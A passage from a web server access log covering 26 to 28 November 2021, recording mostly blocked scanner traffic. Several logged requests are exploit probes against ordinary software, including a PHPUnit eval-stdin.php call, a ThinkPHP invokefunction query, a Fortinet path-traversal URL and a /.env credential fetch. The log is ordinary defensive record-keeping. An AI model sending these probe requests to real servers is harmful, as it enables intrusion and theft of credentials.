x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:11:53:54 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:12:02:58 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:13:03:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.0.214.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Nov/2021:13:08:37 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:14:10:59 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [26/Nov/2021:14:14:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.154.44.158] [Length 0] [Gzip -] "-" "-" [26/Nov/2021:14:41:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [26/Nov/2021:15:06:27 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:15:13:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Nov/2021:15:47:15 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:15:58:57 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:15:58:57 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:16:50:47 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:17:01:53 +0000] 400 - - http localhost "-" [Client 74.201.30.207] [Length 0] [Gzip -] "-" "-" [26/Nov/2021:17:28:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Nov/2021:18:04:34 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Nov/2021:18:04:34 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Nov/2021:18:04:34 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Nov/2021:18:04:34 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Nov/2021:18:04:34 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Nov/2021:18:04:34 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [26/Nov/2021:18:39:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:19:26:57 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:19:28:54 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:19:28:54 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:19:34:46 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [26/Nov/2021:19:52:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [26/Nov/2021:20:20:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:20:35:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Nov/2021:21:04:41 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:21:04:41 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:23:02:44 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:23:02:45 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:23:26:01 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.37] [Length 0] [Gzip -] "Go http package" "-" [26/Nov/2021:23:47:20 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Nov/2021:23:58:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Nov/2021:23:58:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Nov/2021:00:01:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.211.144] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Nov/2021:00:24:44 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.186] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Nov/2021:01:38:46 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Nov/2021:01:38:46 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Nov/2021:01:49:02 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [27/Nov/2021:01:49:03 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [27/Nov/2021:02:08:34 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [27/Nov/2021:02:45:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.207.62] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Nov/2021:04:39:51 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.96.130.15] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [27/Nov/2021:05:24:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Nov/2021:05:27:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [27/Nov/2021:06:04:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [27/Nov/2021:06:36:31 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 185.180.143.137] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Nov/2021:07:01:47 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.205.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Nov/2021:07:08:51 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:07:29:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:07:58:06 +0000] 400 - GET http localhost "/" [Client 167.71.218.228] [Length 252] [Gzip -] "-" "-" [27/Nov/2021:08:57:33 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:09:32:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 141.98.83.139] [Length 252] [Gzip -] "test" "-" [27/Nov/2021:09:43:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [27/Nov/2021:10:31:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.211.245] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Nov/2021:10:47:42 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:12:21:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 91.236.177.162] [Length 252] [Gzip -] "curl/7.58.0" "-" [27/Nov/2021:12:32:28 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:13:27:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:14:45:38 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [27/Nov/2021:15:08:04 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [27/Nov/2021:15:08:04 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [27/Nov/2021:15:11:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Nov/2021:15:21:13 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [27/Nov/2021:15:21:14 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [27/Nov/2021:15:23:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 62.210.188.203] [Length 0] [Gzip -] "libwww-perl/6.58" "-" [27/Nov/2021:15:52:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.60] [Length 0] [Gzip -] "-" "-" [27/Nov/2021:15:52:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "-" "-" [27/Nov/2021:15:52:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [27/Nov/2021:16:29:13 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [27/Nov/2021:16:58:29 +0000] 444 - GET https 64.22.31.253 "/api/productConfig" [Client 185.162.235.164] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36" "-" [27/Nov/2021:18:04:39 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Nov/2021:18:04:39 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Nov/2021:18:04:39 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Nov/2021:18:04:39 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Nov/2021:18:04:39 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Nov/2021:18:04:39 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [27/Nov/2021:18:07:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [27/Nov/2021:18:08:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 152.32.135.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [27/Nov/2021:18:08:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.36.107.222] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [27/Nov/2021:19:14:31 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 213.5.47.43] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [27/Nov/2021:21:13:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.41] [Length 0] [Gzip -] "-" "-" [27/Nov/2021:21:13:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.41] [Length 252] [Gzip -] "-" "-" [27/Nov/2021:21:13:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [27/Nov/2021:22:09:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 147.182.154.77] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [27/Nov/2021:22:09:29 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 147.182.154.77] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [28/Nov/2021:00:22:04 +0000] 444 - POST https 64.22.31.253 "/" [Client 144.91.120.11] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [28/Nov/2021:01:39:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [28/Nov/2021:01:45:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:01:50:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.132.160.178] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [28/Nov/2021:01:50:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.132.160.178] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [28/Nov/2021:01:50:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.132.160.178] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [28/Nov/2021:01:50:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.132.160.178] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [28/Nov/2021:01:52:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:02:04:02 +0000] 400 - - http localhost "-" [Client 43.132.160.178] [Length 154] [Gzip -] "-" "-" [28/Nov/2021:02:06:16 +0000] 400 - GET http localhost "/0bef" [Client 172.105.89.161] [Length 252] [Gzip -] "-" "-" [28/Nov/2021:02:16:46 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:02:37:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.226.4] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [28/Nov/2021:03:31:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 217.112.83.246] [Length 252] [Gzip -] "curl/7.58.0" "-" [28/Nov/2021:03:40:31 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:04:00:27 +0000] 400 - - http localhost "-" [Client 193.110.95.34] [Length 154] [Gzip -] "-" "-" [28/Nov/2021:04:26:16 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:05:07:56 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [28/Nov/2021:05:13:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [28/Nov/2021:05:55:32 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:06:47:43 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:07:09:20 +0000] 444 - GET https api.weaapi.com "/w4s/app/home/index" [Client 205.185.123.61] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" "https://api.weaapi.com" [28/Nov/2021:07:11:15 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [28/Nov/2021:07:40:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.71.175.10] [Length 252] [Gzip -] "curl/7.58.0" "-" [28/Nov/2021:08:09:12 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:08:35:53 +0000] 444 - GET https api.weaapi.com "/w4s/app/home/index" [Client 205.185.124.172] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" "https://api.weaapi.com" [28/Nov/2021:08:41:16 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:09:27:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:10:07:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.220.101.38] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [28/Nov/2021:10:07:49 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.148] [Length 0] [Gzip -] "-" "-" [28/Nov/2021:10:07:54 +0000] 400 - - https localhost "-" [Client 23.129.64.146] [Length 154] [Gzip -] "-" "-" [28/Nov/2021:10:07:56 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.146] [Length 0] [Gzip -] "-" "-" [28/Nov/2021:10:08:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 209.141.58.146] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [28/Nov/2021:10:09:49 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [28/Nov/2021:12:15:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.67] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:13:02:28 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [28/Nov/2021:13:18:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" 